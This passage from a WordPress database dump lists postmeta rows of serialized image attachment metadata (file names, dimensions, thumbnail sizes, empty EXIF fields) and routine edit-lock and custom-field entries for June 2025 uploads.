(3878,1382,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:19:\"2025/06/19488_0.jpg\";s:8:\"filesize\";i:219649;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19488_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15647;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19488_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119758;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19488_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7583;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"19488_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74131;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"19488_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:228672;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19488_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20360;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3879,1383,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:19:\"2025/06/19487_0.jpg\";s:8:\"filesize\";i:239253;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19487_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17755;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19487_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131701;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19487_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8746;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"19487_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82130;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"19487_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:249392;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19487_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22529;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3880,1384,'_wp_attached_file','2025/06/19489_0.jpg'),
(3881,1384,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:19:\"2025/06/19489_0.jpg\";s:8:\"filesize\";i:237551;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19489_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17201;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19489_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129386;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19489_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8570;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"19489_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79867;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"19489_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246466;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19489_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21733;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3882,1385,'_wp_attached_file','2025/06/19485_0.jpg'),
(3883,1385,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:19:\"2025/06/19485_0.jpg\";s:8:\"filesize\";i:226200;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19485_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17532;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19485_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126832;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19485_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8568;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"19485_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79302;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"19485_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:238567;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19485_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21862;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3884,1386,'_wp_attached_file','2025/06/308365_0.jpg'),
(3885,1386,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:20:\"2025/06/308365_0.jpg\";s:8:\"filesize\";i:251397;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"308365_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19656;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"308365_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144875;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"308365_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9327;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"308365_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91577;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"308365_0-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264215;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"308365_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24837;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3886,1387,'_wp_attached_file','2025/06/308366_0.jpg'),
(3887,1387,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:20:\"2025/06/308366_0.jpg\";s:8:\"filesize\";i:271937;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"308366_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18610;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"308366_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149522;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"308366_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"308366_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93420;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"308366_0-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:281145;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"308366_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24325;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3888,1388,'_wp_attached_file','2025/06/308369.jpg'),
(3889,1389,'_wp_attached_file','2025/06/308367_0.jpg'),
(3890,1388,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1704;s:4:\"file\";s:18:\"2025/06/308369.jpg\";s:8:\"filesize\";i:179822;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"308369-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15562;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"308369-578x1024.jpg\";s:5:\"width\";i:578;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105713;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"308369-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8759;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"308369-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161209;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"308369-866x1536.jpg\";s:5:\"width\";i:866;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192653;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"308369-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16486;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3891,1389,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:20:\"2025/06/308367_0.jpg\";s:8:\"filesize\";i:245062;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"308367_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18512;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"308367_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140021;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"308367_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8941;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"308367_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88660;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"308367_0-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:256694;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"308367_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24007;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3893,1379,'_thumbnail_id','1381'),
(3894,1379,'_edit_last','1'),
(3895,1379,'title_style','default'),
(3896,1379,'_title_style','field_5d1a0217cf408'),
(3897,1379,'related',''),
(3898,1379,'_related','field_603b51c3e183e'),
(3899,1390,'title_style','default'),
(3900,1390,'_title_style','field_5d1a0217cf408'),
(3901,1390,'related',''),
(3902,1390,'_related','field_603b51c3e183e'),
(3903,1391,'_edit_lock','1750043554:1'),
(3904,1392,'_wp_attached_file','2025/06/7-68.png'),
(3905,1392,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/06/7-68.png\";s:8:\"filesize\";i:2623053;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"7-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94717;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"7-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:772693;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"7-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38913;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"7-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:855822;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"7-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1550812;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"7-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115080;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3907,1391,'_thumbnail_id','1392'),
(3908,1391,'_edit_last','1'),
(3909,1391,'title_style','default'),
(3910,1391,'_title_style','field_5d1a0217cf408'),
(3911,1391,'related',''),
(3912,1391,'_related','field_603b51c3e183e'),
(3913,1393,'title_style','default'),
(3914,1393,'_title_style','field_5d1a0217cf408'),
(3915,1393,'related',''),
(3916,1393,'_related','field_603b51c3e183e'),
(3918,1395,'title_style','default'),
(3919,1395,'_title_style','field_5d1a0217cf408'),
(3921,1397,'title_style','default'),
(3922,1397,'_title_style','field_5d1a0217cf408'),
(3923,1398,'title_style','default'),
(3924,1398,'_title_style','field_5d1a0217cf408'),
(3925,1399,'title_style','default'),
(3926,1399,'_title_style','field_5d1a0217cf408'),
(3927,1400,'_edit_lock','1750064630:1'),
(3928,1401,'_wp_attached_file','2025/06/8-68.png'),
(3929,1401,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/06/8-68.png\";s:8:\"filesize\";i:2352866;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"8-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101169;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"8-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:761265;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"8-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43945;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"8-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:838239;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"8-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1469225;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"8-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125408;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3931,1400,'_thumbnail_id','1401'),
(3932,1400,'_edit_last','1'),
(3933,1400,'title_style','default'),
(3934,1400,'_title_style','field_5d1a0217cf408'),
(3935,1400,'related',''),
(3936,1400,'_related','field_603b51c3e183e'),
(3937,1402,'title_style','default'),
(3938,1402,'_title_style','field_5d1a0217cf408'),
(3939,1402,'related',''),
(3940,1402,'_related','field_603b51c3e183e'),
(3941,1403,'_edit_lock','1750064773:1'),
(3942,1404,'_wp_attached_file','2025/06/309533.jpg'),
(3943,1404,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1074;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2025/06/309533.jpg\";s:8:\"filesize\";i:75025;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"309533-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17079;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"309533-1024x622.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:622;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90881;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"309533-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8587;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"309533-768x466.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:466;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62633;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"309533-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19429;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3944,1405,'_wp_attached_file','2025/06/1564911.jpg'),
(3945,1406,'_wp_attached_file','2025/06/309534.jpg'),
(3946,1405,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1883;s:6:\"height\";i:869;s:4:\"file\";s:19:\"2025/06/1564911.jpg\";s:8:\"filesize\";i:133544;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1564911-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13092;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1564911-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76774;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1564911-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8446;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1564911-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51488;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1564911-1536x709.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133011;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1564911-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19007;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3947,1406,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1671;s:6:\"height\";i:779;s:4:\"file\";s:18:\"2025/06/309534.jpg\";s:8:\"filesize\";i:101052;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"309534-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12947;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"309534-1024x477.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:477;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69656;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"309534-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7054;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"309534-768x358.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:358;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47300;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"309534-1536x716.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:716;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119925;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"309534-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17499;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3948,1407,'_wp_attached_file','2025/06/1564919.jpg'),
